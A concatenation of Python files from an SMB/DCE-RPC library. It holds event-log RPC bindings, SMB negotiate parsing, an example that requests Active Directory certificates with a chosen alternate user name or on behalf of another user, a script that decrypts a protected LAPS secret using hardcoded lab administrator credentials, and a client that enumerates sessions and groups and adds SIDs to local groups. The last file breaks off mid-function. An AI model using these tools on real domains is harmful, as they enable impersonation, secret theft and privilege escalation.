# 3.1.4.18 ElfrNumberOfRecords (Opnum 4)
class ElfrNumberOfRecords(NDRCALL):
	opnum = 4
	structure = (
		('LogHandle', IELF_HANDLE),
	)

class ElfrNumberOfRecordsResponse(NDRCALL):
	structure = (
		('NumberOfRecords', ULONG),
		('ErrorCode', NTSTATUS),
	)

# 3.1.4.19 ElfrOldestRecord (Opnum 5)
class ElfrOldestRecord(NDRCALL):
	opnum = 5
	structure = (
		('LogHandle', IELF_HANDLE),
	)

class ElfrOldestRecordResponse(NDRCALL):
	structure = (
		('OldestRecordNumber', ULONG),
		('ErrorCode', NTSTATUS),
	)

# 3.1.4.3 ElfrOpenELW (Opnum 7)
class ElfrOpenELW(NDRCALL):
	opnum = 7
	structure = (
	   ('UNCServerName', EVENTLOG_HANDLE_W),
	   ('ModuleName', RPC_UNICODE_STRING),
	   ('RegModuleName', RPC_UNICODE_STRING),
	   ('MajorVersion', ULONG),
	   ('MinorVersion', ULONG),
	)

class ElfrOpenELWResponse(NDRCALL):
	structure = (
	   ('LogHandle', IELF_HANDLE),
	   ('ErrorCode', NTSTATUS),
	)

# 3.1.4.5 ElfrRegisterEventSourceW (Opnum 8)
class ElfrRegisterEventSourceW(NDRCALL):
	opnum = 8
	structure = (
	   ('UNCServerName', EVENTLOG_HANDLE_W),
	   ('ModuleName', RPC_UNICODE_STRING),
	   ('RegModuleName', RPC_UNICODE_STRING),
	   ('MajorVersion', ULONG),
	   ('MinorVersion', ULONG),
	)

class ElfrRegisterEventSourceWResponse(NDRCALL):
	structure = (
	   ('LogHandle', IELF_HANDLE),
	   ('ErrorCode', NTSTATUS),
	)

# 3.1.4.1 ElfrOpenBELW (Opnum 9)
class ElfrOpenBELW(NDRCALL):
	opnum = 9
	structure = (
	   ('UNCServerName', EVENTLOG_HANDLE_W),
	   ('BackupFileName', RPC_UNICODE_STRING),
	   ('MajorVersion', ULONG),
	   ('MinorVersion', ULONG),
	)

class ElfrOpenBELWResponse(NDRCALL):
	structure = (
	   ('LogHandle', IELF_HANDLE),
	   ('ErrorCode', NTSTATUS),
	)

# 3.1.4.7 ElfrReadELW (Opnum 10)
class ElfrReadELW(NDRCALL):
	opnum = 10
	structure = (
	   ('LogHandle', IELF_HANDLE),
	   ('ReadFlags', ULONG),
	   ('RecordOffset', ULONG),
	   ('NumberOfBytesToRead', ULONG),
	)

class ElfrReadELWResponse(NDRCALL):
	structure = (
	   ('Buffer', NDRUniConformantArray),
	   ('NumberOfBytesRead', ULONG),
	   ('MinNumberOfBytesNeeded', ULONG),
	   ('ErrorCode', NTSTATUS),
	)

# 3.1.4.13 ElfrReportEventW (Opnum 11)
class ElfrReportEventW(NDRCALL):
	opnum = 11
	structure = (
	   ('LogHandle', IELF_HANDLE),
	   ('Time', ULONG),
	   ('EventType', USHORT),
	   ('EventCategory', USHORT),
	   ('EventID', ULONG),
	   ('NumStrings', USHORT),
	   ('DataSize', ULONG),
	   ('ComputerName', RPC_UNICODE_STRING),
	   ('UserSID', PRPC_SID),
	   ('Strings', PRPC_UNICODE_STRING_ARRAY),
	   ('Data', LPBYTE),
	   ('Flags', USHORT),
	   ('RecordNumber', PULONG),
	   ('TimeWritten', PULONG),
	)

class ElfrReportEventWResponse(NDRCALL):
	structure = (
	   ('RecordNumber', PULONG),
	   ('TimeWritten', PULONG),
	   ('ErrorCode', NTSTATUS),
	)

################################################################################
# OPNUMs and their corresponding structures
################################################################################
OPNUMS = {
	0   : (ElfrClearELFW, ElfrClearELFWResponse),
	1   : (ElfrBackupELFW, ElfrBackupELFWResponse),
	2   : (ElfrCloseEL, ElfrCloseELResponse),
	4   : (ElfrNumberOfRecords, ElfrNumberOfRecordsResponse),
	5   : (ElfrOldestRecord, ElfrOldestRecordResponse),
	7   : (ElfrOpenELW, ElfrOpenELWResponse),
	8   : (ElfrRegisterEventSourceW, ElfrRegisterEventSourceWResponse),
	9   : (ElfrOpenBELW, ElfrOpenBELWResponse),
	10  : (ElfrReadELW, ElfrReadELWResponse),
	11  : (ElfrReportEventW, ElfrReportEventWResponse),
}

################################################################################
# HELPER FUNCTIONS
################################################################################
async def hElfrOpenBELW(dce, backupFileName = NULL):
	request = ElfrOpenBELW()
	request['UNCServerName'] = NULL
	request['BackupFileName'] = backupFileName
	request['MajorVersion'] = 1
	request['MinorVersion'] = 1
	return await dce.request(request)

async def hElfrOpenELW(dce, moduleName = NULL, regModuleName = NULL):
	request = ElfrOpenELW()
	request['UNCServerName'] = NULL
	request['ModuleName'] = moduleName
	request['RegModuleName'] = regModuleName
	request['MajorVersion'] = 1
	request['MinorVersion'] = 1
	return await dce.request(request)

async def hElfrCloseEL(dce, logHandle):
	request = ElfrCloseEL()
	request['LogHandle'] = logHandle
	resp = dce.request(request)
	return await resp

async def hElfrRegisterEventSourceW(dce, moduleName = NULL, regModuleName = NULL):
	request = ElfrRegisterEventSourceW()
	request['UNCServerName'] = NULL
	request['ModuleName'] = moduleName
	request['RegModuleName'] = regModuleName
	request['MajorVersion'] = 1
	request['MinorVersion'] = 1
	return await dce.request(request)

async def hElfrReadELW(dce, logHandle = '', readFlags = EVENTLOG_SEEK_READ|EVENTLOG_FORWARDS_READ,
				 recordOffset = 0, numberOfBytesToRead = MAX_BATCH_BUFF):
	request = ElfrReadELW()
	request['LogHandle'] = logHandle
	request['ReadFlags'] = readFlags
	request['RecordOffset'] = recordOffset
	request['NumberOfBytesToRead'] = numberOfBytesToRead
	return await dce.request(request)

async def hElfrClearELFW(dce, logHandle = '', backupFileName = NULL):
	request = ElfrClearELFW()
	request['LogHandle'] = logHandle
	request['BackupFileName'] = backupFileName
	return await dce.request(request)

async def hElfrBackupELFW(dce, logHandle = '', backupFileName = NULL):
	request = ElfrBackupELFW()
	request['LogHandle'] = logHandle
	request['BackupFileName'] = backupFileName
	return await dce.request(request)

async def hElfrNumberOfRecords(dce, logHandle):
	request = ElfrNumberOfRecords()
	request['LogHandle'] = logHandle
	resp = dce.request(request)
	return await resp

async def hElfrOldestRecordNumber(dce, logHandle):
	request = ElfrOldestRecord()
	request['LogHandle'] = logHandle
	resp = dce.request(request)
	return await resp



import io
from aiosmb.protocol.smb.commons import SMBSecurityMode

# https://msdn.microsoft.com/en-us/library/ee441913.aspx
class SMB_COM_NEGOTIATE_REQ:
	def __init__(self):
		##### parameters ####
		self.WordCount = 0
		##### SMB_Data ###
		self.ByteCount = None
		self.Dialects  = [] #list fo dialect strings

	@staticmethod
	def from_bytes(bbuff):
		return SMB_COM_NEGOTIATE_REQ.from_buffer(io.BytesIO(bbuff))

	@staticmethod
	def from_buffer(buff):
		cmd = SMB_COM_NEGOTIATE_REQ()
		cmd.WordCount = int.from_bytes(buff.read(1), byteorder='little', signed = False)
		cmd.ByteCount = int.from_bytes(buff.read(2), byteorder='little', signed = False)
		dialect_buffer = buff.read(cmd.ByteCount)
		#print(dialect_buffer)
		
		i = 0
		while i < len(dialect_buffer):
			if not dialect_buffer[i] == 2:
				#print(i)
				raise Exception('Dialect buffer expected byte 0x02!')
			m = dialect_buffer[i:].find(b'\x00')
			if m == -1:
				raise Exception('Could not find end of string!')
			cmd.Dialects.append(dialect_buffer[i+1: m+i].decode('ascii'))
			i += m+1
		return cmd
		
		
	def to_bytes(self):
		t = self.WordCount.to_bytes(1, byteorder='little', signed = False)
		
		dialect_buffer = b''
		for dialect in self.Dialects:
			dialect_buffer += b'\x02' + dialect.encode('ascii') + b'\x00'
			
		t+= len(dialect_buffer).to_bytes(2, byteorder='little', signed = False)
		t+= dialect_buffer
		
		return t

	def __repr__(self):
		t = '===SMB_COM_NEGOTIATE_REQ===\r\n'
		return t
		


# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-cifs/a4229e1a-8a4e-489a-a2eb-11b7f360e60c
class SMB_COM_NEGOTIATE_REPLY:
	def __init__(self):
		##### parameters ####
		self.WordCount = 0
		self.DialectIndex = None
		self.SecurityMode = None
		self.MaxMpxCount = None
		self.MaxNumberVcs = None
		self.MaxBufferSize = None
		self.MaxRawSize = None
		self.SessionKey = None
		self.Capabilities = None
		self.SystemTime = None
		self.ServerTimeZone = None
		self.ChallengeLength = None
		##### SMB_Data ###
		self.ByteCount = None
		self.Challenge = None
		self.DomainName = None

	@staticmethod
	def from_bytes(bbuff):
		return SMB_COM_NEGOTIATE_REPLY.from_buffer(io.BytesIO(bbuff))

	@staticmethod
	def from_buffer(buff):
		cmd = SMB_COM_NEGOTIATE_REPLY()
		cmd.WordCount = int.from_bytes(buff.read(1), byteorder='little', signed = False) # 0x11
		cmd.DialectIndex = int.from_bytes(buff.read(2), byteorder='little', signed = False)
		cmd.SecurityMode = SMBSecurityMode(int.from_bytes(buff.read(1), byteorder='little', signed = False))
		cmd.MaxMpxCount = int.from_bytes(buff.read(2), byteorder='little', signed = False)
		cmd.MaxNumberVcs = int.from_bytes(buff.read(2), byteorder='little', signed = False)
		cmd.MaxBufferSize = int.from_bytes(buff.read(4), byteorder='little', signed = False)
		cmd.MaxRawSize = int.from_bytes(buff.read(4), byteorder='little', signed = False)
		cmd.SessionKey = buff.read(4)
		cmd.Capabilities = int.from_bytes(buff.read(4), byteorder='little', signed = False)
		cmd.SystemTime = buff.read(8)
		cmd.ServerTimeZone = int.from_bytes(buff.read(2), byteorder='little', signed = False)
		cmd.ChallengeLength = int.from_bytes(buff.read(1), byteorder='little', signed = False)
		
		
		cmd.ByteCount = int.from_bytes(buff.read(2), byteorder='little', signed = False)

		cmd.Challenge = buff.read(cmd.ChallengeLength)
		cmd.DomainName = buff.read(cmd.ByteCount - cmd.ChallengeLength)
		
		return cmd

	def __repr__(self):
		t = '===SMB_COM_NEGOTIATE_REPLY===\r\n'
		for x in self.__dict__:
			t += '%s : %s \n' % (x, self.__dict__[x])
		return t



# This example is based on the awesome code of @zer1t0 's certi project
# https://github.com/zer1t0/certi
# 

import asyncio
import traceback
import logging
import os

from aiosmb import logger
from aiosmb._version import __banner__
from aiosmb.commons.connection.factory import SMBConnectionFactory
from aiosmb.dcerpc.v5.interfaces.icprmgr import ICPRRPC
from aiosmb.dcerpc.v5.connection import DCERPC5Connection
from aiosmb.dcerpc.v5.common.connection.authentication import DCERPCAuth
from aiosmb.dcerpc.v5.interfaces.endpointmgr import EPM

from msldap.ldap_objects.adcertificatetemplate import EKUS_NAMES
from cryptography.hazmat.primitives.asymmetric import padding, rsa
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.serialization import Encoding, pkcs7, pkcs12, BestAvailableEncryption, load_pem_private_key
from cryptography import x509
from cryptography.x509.oid import ExtensionOID, NameOID
from asn1crypto import core

PRINCIPAL_NAME = x509.ObjectIdentifier("1.3.6.1.4.1.311.20.2.3")


async def amain(url, service, template, altname, onbehalf, cn = None, pfx_file = None, pfx_password = None, enroll_cert = None, enroll_password = None):
	try:
		if pfx_file is None:
			pfx_file = 'cert_%s.pfx' % os.urandom(4).hex()
		if pfx_password is None:
			pfx_password = 'admin'
		
		print('[+] Parsing connection parameters...')
		su = SMBConnectionFactory.from_url(url)
		ip = su.get_target().get_hostname_or_ip()

		if cn is None:
			cn = '%s@%s' % (su.credential.username, su.credential.domain)
		
		print('[*] Using CN: %s' % cn)
		
		print('[+] Generating RSA privat key...')
		key = rsa.generate_private_key(0x10001, 2048)

		print('[+] Building certificate request...')
		attributes = {
			"CertificateTemplate": template,
		}
		csr = x509.CertificateSigningRequestBuilder()
		csr = csr.subject_name(
				x509.Name(
					[
						x509.NameAttribute(NameOID.COMMON_NAME, cn),
					]
				)
			)

		if altname:
			altname = core.UTF8String(altname).dump()
			csr = csr.add_extension(
				x509.SubjectAlternativeName(
					[
						x509.OtherName(PRINCIPAL_NAME, altname),
					]
				),
				critical=False,
			)

		csr = csr.sign(key, hashes.SHA256())
		
		if onbehalf is not None:
			agent_key = None
			agent_cert = None
			with open(enroll_cert, 'rb') as f:
				agent_key, agent_cert, _ = pkcs12.load_key_and_certificates(f.read(), enroll_password)
				
			pkcs7builder = pkcs7.PKCS7SignatureBuilder().set_data(csr).add_signer(agent_key, agent_cert, hashes.SHA1())
			csr = pkcs7builder.sign(Encoding.DER, options=[pkcs7.PKCS7Options.Binary])
		else:
			csr = csr.public_bytes(Encoding.DER)
		
		print('[+] Connecting to EPM...')
		target, err = await EPM.create_target(ip, ICPRRPC().service_uuid, dc_ip = su.get_target().dc_ip, domain = su.get_target().domain)
		if err is not None:
			raise err
		
		print('[+] Connecting to ICRPR service...')
		auth = DCERPCAuth.from_smb_gssapi(su.get_credential())
		connection = DCERPC5Connection(auth, target)
		rpc, err = await ICPRRPC.from_rpcconnection(connection, perform_dummy=True)
		if err is not None:
			raise err
		logger.debug('DCE Connected!')
		
		print('[+] Requesting certificate from the service...')
		res, err = await rpc.request_certificate(service, csr, attributes)
		if err is not None:
			print('[-] Request failed!')
			raise err
		
		
		if res['encodedcert'] in [None, b'']:
			raise Exception('No certificate was returned from server!. Full message: %s' % res)
		
		print('[+] Got certificate!')
		cert = x509.load_der_x509_certificate(res['encodedcert'])
		print("[*]   Cert subject: {}".format(cert.subject.rfc4514_string()))
		print("[*]   Cert issuer: {}".format(cert.issuer.rfc4514_string()))
		print("[*]   Cert Serial: {:X}".format(cert.serial_number))
		
		try:
			ext = cert.extensions.get_extension_for_oid(ExtensionOID.EXTENDED_KEY_USAGE)
			for oid in ext.value:
				print("[*]   Cert Extended Key Usage: {}".format(EKUS_NAMES.get(oid.dotted_string, oid.dotted_string)))
		except:
			print('[-]   Could not verify extended key usage')

		try:
			ext = cert.extensions.get_extension_for_oid(ExtensionOID.SUBJECT_ALTERNATIVE_NAME)
			for name in ext.value.get_values_for_type(x509.OtherName):
				if name.type_id == x509.ObjectIdentifier("1.3.6.1.4.1.311.20.2.3"):
					print('[*]   Certificate ALT NAME: %s' % core.UTF8String.load(name.value).native)
					break
			else:
				print('[-]   Certificate doesnt have ALT NAME')
		except:
			print('[-]   Certificate doesnt have ALT NAME')
		
		print('[+] Writing certificate to disk (file:"%s" pass: "%s")...' % (pfx_file, pfx_password))
		
		# Still waiting for the day oscrypto will have a pfx serializer :(
		# Until that we'd need to use cryptography
		with open(pfx_file, 'wb') as f:
			data = pkcs12.serialize_key_and_certificates(
				name=b"",
				key=key,
				cert=cert,
				cas=None,
				encryption_algorithm=BestAvailableEncryption(pfx_password.encode())
			)
			f.write(data)

		print('[+] Finished!')
		return True, None
	except Exception as e:
		traceback.print_exc()
		return False, e


def main():
	import argparse

	parser = argparse.ArgumentParser(description='Request certificate via ICPR-RPC service')
	parser.add_argument('-v', '--verbose', action='count', default=0)
	parser.add_argument('--pfx-file', help = 'Output PFX file name. Default is cert_<rand>.pfx')
	parser.add_argument('--pfx-pass', default = 'admin', help = 'Ouput PFX file password')
	parser.add_argument('--alt-name', help = 'Alternate username. Preferable username@FQDN format')
	parser.add_argument('--cn', help = 'CN (common name). In case you want to set it to something custom. Preferable username@FQDN format')
	agentenroll = parser.add_argument_group('Agent enrollment parameters')
	agentenroll.add_argument('--on-behalf', help = 'On behalf username')
	agentenroll.add_argument('--enroll-cert', help = 'Agent enrollment PFX file')
	agentenroll.add_argument('--enroll-pass', help = 'Agent enrollment PFX file password')

	parser.add_argument('smb_url', help = 'Connection string that describes the authentication and target. Example: smb+ntlm-password://TEST\\Administrator:password@10.10.10.2')
	parser.add_argument('service', help = 'Enrollment service endpoint')
	parser.add_argument('template', help = 'Certificate template name to use')
	
	args = parser.parse_args()
	print(__banner__)

	if args.verbose >=1:
		logger.setLevel(logging.DEBUG)

	asyncio.run(
		amain(
			args.smb_url,
			args.service,
			args.template,
			args.alt_name,
			args.on_behalf,
			args.cn,
			args.pfx_file,
			args.pfx_pass,
			args.enroll_cert,
			args.enroll_pass
		)
	)

if __name__ == '__main__':
	main()



import asyncio
import os
import uuid
from cryptography.hazmat.primitives import hashes

from aiosmb.dcerpc.v5.common.connection.smbdcefactory import SMBDCEFactory
from aiosmb.dcerpc.v5.connection import DCERPC5Connection
from aiosmb.connection import SMBConnection
from aiosmb.dcerpc.v5 import gkdi
from aiosmb.dcerpc.v5.interfaces.endpointmgr import EPM
from aiosmb.dcerpc.v5.rpcrt import DCERPCException
from aiosmb import logger
from aiosmb.commons.utils.extb import pprint_exc
from aiosmb.dcerpc.v5.dtypes import NULL
from aiosmb.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_NONE, RPC_C_AUTHN_LEVEL_PKT_INTEGRITY, RPC_C_AUTHN_LEVEL_PKT_PRIVACY, DCERPCException, RPC_C_AUTHN_GSS_NEGOTIATE, RPC_C_AUTHN_LEVEL_CONNECT
from aiosmb.dcerpc.v5.common.connection.authentication import DCERPCAuth
from aiosmb.dcerpc.v5.common.connection.target import DCERPCTarget

class GKDIMgr:
	def __init__(self):
		self.service_pipename = None
		self.service_uuid = gkdi.MSRPC_UUID_GKDI
		self.dce = None
		self.handle = None
	
	async def __aenter__(self):
		return self
	
	async def __aexit__(self, exc_type, exc, traceback):
		await self.close()
		return True, None
	
	async def close(self):		
		try:
			if self.dce:
				try:
					await self.dce.disconnect()
				except:
					pass
				return True, None
		except Exception as e:
			return None, e
	
	@staticmethod
	async def from_rpcconnection(connection:DCERPC5Connection, auth_level = None, open:bool = True, perform_dummy:bool = False):
		try:
			service = GKDIMgr()
			service.dce = connection
			
			#service.dce.set_auth_level(auth_level)
			# RPC_C_AUTHN_LEVEL_PKT_PRIVACY
			if auth_level is None:
				service.dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY) #secure default :P
			
			_, err = await service.dce.connect()
			if err is not None:
				raise err
			
			_, err = await service.dce.bind(GKDIMgr().service_uuid)
			if err is not None:
				raise err
				
			return service, None
		except Exception as e:
			return False, e
	
	@staticmethod
	async def from_smbconnection(connection:SMBConnection, auth_level = None, open:bool = True, perform_dummy:bool = False):
		"""
		Creates the connection to the service using an established SMBConnection.
		This connection will use the given SMBConnection as transport layer.
		"""
		try:
			rpctransport = SMBDCEFactory(connection)		
			service, err = await GKDIMgr.from_rpcconnection(rpctransport.get_dce_rpc(), auth_level=auth_level, open=open, perform_dummy = perform_dummy)	
			if err is not None:
				raise err

			return service, None
		except Exception as e:
			return None, e

	async def GetKey(self, targetSD, rootKey, L0KeyID, L1KeyID, L2KeyID):
		if isinstance(rootKey, uuid.UUID):
			rootKey = rootKey.bytes_le
		resp, err = await gkdi.hGetKey(self.dce, targetSD, rootKey, L0KeyID, L1KeyID, L2KeyID)
		if err is not None:
			return None, err
		gke_raw = b''.join(resp['ppbOut'])
		print('RAW')
		print(gke_raw.hex())
		print('------')
		return gkdi.GroupKeyEnvelope.unpack(gke_raw), None

	async def ncrypt_unprotect_secret(self, data):
		blob = gkdi.DPAPINGBlob.unpack(data)
		print(blob)
		target_sd = blob.protection_descriptor.get_target_sd()
		rk, err = await self.GetKey(
            target_sd,
            blob.key_identifier.root_key_identifier,
            blob.key_identifier.l0,
            blob.key_identifier.l1,
            blob.key_identifier.l2
        )
		if err is not None:
			return None, err

		print(rk)
		return gkdi.decrypt_blob(blob, rk), None



async def amain(url):
	import traceback
	from aiosmb.commons.connection.factory import SMBConnectionFactory

	data = bytes.fromhex('c571d901171889ade6040000000000003082045006092a864886f70d010703a08204413082043d02010231820409a2820405020104308203c704820370010000004b44534b03000000690100000f0000001e00000069d83cd1d10ebfac4620a164e805f56e080300001a0000001a000000444850420001000087a8e61db4b6663cffbbd19c651959998ceef608660dd0f25d2ceed4435e3b00e00df8f1d61957d4faf7df4561b2aa3016c3d91134096faa3bf4296d830e9a7c209e0c6497517abd5a8a9d306bcf67ed91f9e6725b4758c022e0b1ef4275bf7b6c5bfc11d45f9088b941f54eb1e59bb8bc39a0bf12307f5c4fdb70c581b23f76b63acae1caa6b7902d52526735488a0ef13c6d9a51bfa4ab3ad8347796524d8ef6a167b5a41825d967e144e5140564251ccacb83e6b486f6b3ca3f7971506026c0b857f689962856ded4010abd0be621c3a3960a54e710c375f26375d7014103a4b54330c198af126116d2276e11715f693877fad7ef09cadb094ae91e1a15973fb32c9b73134d0b2e77506660edbd484ca7b18f21ef205407f4793a1a0ba12510dbc15077be463fff4fed4aac0bb555be3a6c1b0c6b47b1bc3773bf7e8c6f62901228f8c28cbb18a55ae31341000a650196f931c77a57f2ddf463e5e9ec144b777de62aaab8a8628ac376d282d6ed3864e67982428ebc831d14348f6f2f9193b5045af2767164e1dfc967c1fb3f2e55a4bd1bffe83b9c80d052b985d182ea0adb2a3b7313d3fe14c8484b1e052588b9b7d2bbd2df016199ecd06e1557cd0915b3353bbb64e0ec377fd028370df92b52c7891428cdc67eb6184b523d1db246c32f63078490f00ef8d647d148d47954515e2327cfef98c582664b4c0f6cc4165911914ea310a2766c1ec2f5ba89d34002d975da503cc1809d05249fbad13f038a5a9fcb381601e04ec4b9b4f31f6ef25a3f56356d28590727df18f626a04caa3cd81ec602c22e0172a029256caf961a461e3ab61502ee6f27f1f134a88f37019534c7075cfe990ecfe535d1042ee1964af66a7e9e1167a0ffbd8359a6042a3117102240cf5cfd9c442259f0f3db45d1dd51a10e7f3e314250f2079b6122d84ebd9d405c83826d625c8a57dfe518389d645ee4daec02d48b7470e8419c84ed7bcabaf47ded6a1b1f132010d35004adf37fec61dfbc008fda690389ed945ea96bad5f3acffe0fe01f818cd10d01d58d012a37b98758928531d9bf5a614041f4cfbf4e00450057004c004100500053002e0043004f005200500000004e00450057004c004100500053002e0043004f00520050000000305106092b0601040182374a013044060a2b0601040182374a01013036303430320c035349440c2b532d312d352d32312d39323130343037302d313632323731323839342d333433363534373836332d353132300b060960864801650304012d04281a7b6922fc2450c81354ad9d3ce1020d24c327a071f57de6a74dddf3c0b4acb9cf3104efc06fb18d302b06092a864886f70d010701301e060960864801650304012e3011040c247911a21b5c7f4fd08359f9020110426af21e4b446113ce8c4ea45685ecf21d800047f61d5772452b3dab1efc093692f0e3fa3a16ad0fbdbe0df9e9953a934ff129848d34c1e1bc2f5eaefbe67eaa40f158759144b800325ac1307aafd02ce418badf3a9ed849d4053ffde7c2a3822d169377ebcce5c9a9a1a95261c02d49ba014edf882aa54141d0d9b5aa03155eef9f05a0233dbbd9c45f62f58f407cd25320')

	url = SMBConnectionFactory.from_url(url)
	connection = url.get_connection()
	epm = EPM.from_smbconnection(connection)
	_, err = await epm.connect()
	if err is not None:
		raise err
	
	constring, err = await epm.map(GKDIMgr().service_uuid)
	if err is not None:
		raise err
	
	target = DCERPCTarget.from_connection_string(constring, smb_connection = connection)
	dcerpc_auth = DCERPCAuth.from_smb_gssapi(connection.gssapi)
	rpc_connection = DCERPC5Connection(dcerpc_auth, target)
	
	service, err = await GKDIMgr.from_rpcconnection(rpc_connection, open=open)
	if err is not None:
		print('Connection to service failed!')
		raise err
	
	secret, err = await service.ncrypt_unprotect_secret(data)
	if err is not None:
		print('Failed to decrypt secret!')
		raise err
	print(secret)

if __name__ == '__main__':
	url = 'smb2+ntlm-password://NEWLAPS\\Administrator:Passw0rd!1@10.10.12.2'
	asyncio.run(amain(url))
	


import asyncio
import traceback
import ntpath
import fnmatch

import shlex
import tqdm
from aiosmb.external.aiocmd.aiocmd import aiocmd
from aiosmb.examples.smbpathcompleter import SMBPathCompleter

from aiosmb import logger
from aiosmb._version import __banner__
from aiosmb.commons.connection.factory import SMBConnectionFactory
from aiosmb.commons.interfaces.machine import SMBMachine
from aiosmb.commons.interfaces.share import SMBShare
from aiosmb.commons.interfaces.file import SMBFile
from aiosmb.commons.exceptions import SMBException, SMBMachineException
from aiosmb.dcerpc.v5.rpcrt import DCERPCException

from asysocks import logger as sockslogger



from aiosmb.wintypes.access_mask import *
from aiosmb.protocol.smb2.commands import *




def req_traceback(funct):
	async def wrapper(*args, **kwargs):
		this = args[0]
		try:
			x = await funct(*args, **kwargs)
			return x
		except Exception as e:
			traceback.print_exc()
			raise e
	return wrapper

class SMBClient(aiocmd.PromptToolkitCmd):
	def __init__(self, url = None, silent = False, no_dce = False):
		aiocmd.PromptToolkitCmd.__init__(self, ignore_sigint=False) #Setting this to false, since True doesnt work on windows...
		self.conn_url = None
		if url is not None:
			self.conn_url = SMBConnectionFactory.from_url(url)
		self.connection = None
		self.machine = None
		self.is_anon = False
		self.silent = silent
		self.no_dce = no_dce # diables ANY use of the DCE protocol (eg. share listing) This is useful for new(er) windows servers where they forbid the users to use any form of DCE

		self.shares = {} #name -> share
		self.__current_share = None
		self.__current_directory = None
	
	async def do_coninfo(self):
		try:
			from aiosmb._version import __version__ as smbver
			from asysocks._version import __version__ as socksver
			from minikerberos._version import __version__ as kerbver
			from winacl._version import __version__ as winaclver

			print(self.conn_url)
			print('AIOSMB: %s' % smbver)
			print('ASYSOCKS: %s' % socksver)
			print('MINIKERBEROS: %s' % kerbver)
			print('WINACL: %s' % winaclver)
			return True, None
		
		except Exception as e:
			traceback.print_exc()
			return None, e

	async def do_login(self, url = None):
		"""Connects to the remote machine"""
		try:
			if self.conn_url is None and url is None:
				print('No url was set, cant do logon')
			if url is not None:
				self.conn_url = SMBConnectionFactory.from_url(url)

			cred = self.conn_url.get_credential()				
			
			self.connection  = self.conn_url.get_connection()
			
			logger.debug(self.conn_url.get_credential())
			logger.debug(self.conn_url.get_target())

			_, err = await self.connection.login()
			if err is not None:
				raise err
			self.is_anon = self.connection.gssapi.is_guest()
			self.machine = SMBMachine(self.connection)
			if self.silent is False:
				print('Login success')
			return True, None
		except Exception as e:
			traceback.print_exc()
			print('Login failed! Reason: %s' % str(e))
			return False, e

	async def do_logout(self):
		if self.machine is not None:
			await self.machine.close()
		self.machine = None

		if self.connection is not None:
			try:
				await self.connection.terminate()
			except Exception as e:
				logger.exception('connection.close')
		self.connection = None

	async def _on_close(self):
		await self.do_logout()

	async def do_nodce(self):
		"""Disables automatic share listing on login"""
		self.no_dce = True

	async def do_shares(self, show = True):
		"""Lists available shares"""
		try:
			if self.machine is None:
				print('Not logged in! Use "login" first!')
				return False, Exception('Not logged in!')
			async for share, err in self.machine.list_shares():
				if err is not None:
					raise err
				self.shares[share.name] = share
				if show is True:
					print(share.name)
			return True, None
				
		except SMBException as e:
			logger.debug(traceback.format_exc())
			print(e.pprint())
			return None, e
		except SMBMachineException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except DCERPCException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
			return None, e
		except Exception as e:
			traceback.print_exc()
			return None, e
		

	async def do_sessions(self):
		"""Lists sessions of connected users"""
		try:
			async for sess, err in self.machine.list_sessions():
				if err is not None:
					raise err
				print("%s : %s" % (sess.username, sess.ip_addr))
		except SMBException as e:
			logger.debug(traceback.format_exc())
			print(e.pprint())
		except SMBMachineException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
		except DCERPCException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
		except Exception as e:
			traceback.print_exc()


	async def do_wsessions(self):
		"""Lists sessions of connected users"""
		try:
			async for sess, err in self.machine.wkstlist_sessions():
				if err is not None:
					raise err
				print("%s" % sess.username)
		except SMBException as e:
			logger.debug(traceback.format_exc())
			print(e.pprint())
		except SMBMachineException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
		except DCERPCException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
		except Exception as e:
			traceback.print_exc()

	async def do_domains(self):
		"""Lists domain"""
		try:
			async for domain, err in self.machine.list_domains():
				if err is not None:
					raise err
				print(domain)
		except SMBException as e:
			logger.debug(traceback.format_exc())
			print(e.pprint())
		except SMBMachineException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
		except DCERPCException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
		except Exception as e:
			traceback.print_exc()

	async def do_localgroups(self):
		"""Lists local groups"""
		try:
			async for name, sid, err in self.machine.list_localgroups():
				if err is not None:
					raise err
				print("%s : %s" % (name, sid))
		except SMBException as e:
			logger.debug(traceback.format_exc())
			print(e.pprint())
		except SMBMachineException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
		except DCERPCException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
		except Exception as e:
			traceback.print_exc()
	
	async def do_domaingroups(self, domain_name):
		"""Lists groups in a domain"""
		try:
			async for name, sid, err in self.machine.list_groups(domain_name):
				if err is not None:
					raise err
				print("%s : %s" % (name, sid))
		except SMBException as e:
			logger.debug(traceback.format_exc())
			print(e.pprint())
		except SMBMachineException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
		except DCERPCException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
		except Exception as e:
			traceback.print_exc()
	
	async def do_groupmembers(self, domain_name, group_name):
		"""Lists members of an arbitrary group"""
		try:
			async for domain, username, sid, err in self.machine.list_group_members(domain_name, group_name):
				if err is not None:
					raise err
				print("%s\\%s : %s" % (domain, username, sid))
		except SMBException as e:
			logger.debug(traceback.format_exc())
			print(e.pprint())
		except SMBMachineException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
		except DCERPCException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
		except Exception as e:
			traceback.print_exc()

	async def do_localgroupmembers(self, group_name):
		"""Lists members of a local group"""
		try:
			async for domain, username, sid, err in self.machine.list_group_members('Builtin', group_name):
				if err is not None:
					raise err
				print("%s\\%s : %s" % (domain, username, sid))
			
		except SMBException as e:
			logger.debug(traceback.format_exc())
			print(e.pprint())
		except SMBMachineException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
		except DCERPCException as e:
			logger.debug(traceback.format_exc())
			print(str(e))
		except Exception as e:
			traceback.print_exc()

	async def do_addsidtolocalgroup(self, group_name, sid):
		"""Add member (by SID) to a local group"""
		try:
			result, err = await self.machine.add_sid_to_group('Builtin', group_name, sid)
			if err is not None:
				raise err
			if result:
				print('Modification OK!')
			else:
				print('Something went wrong, status != ok')
			
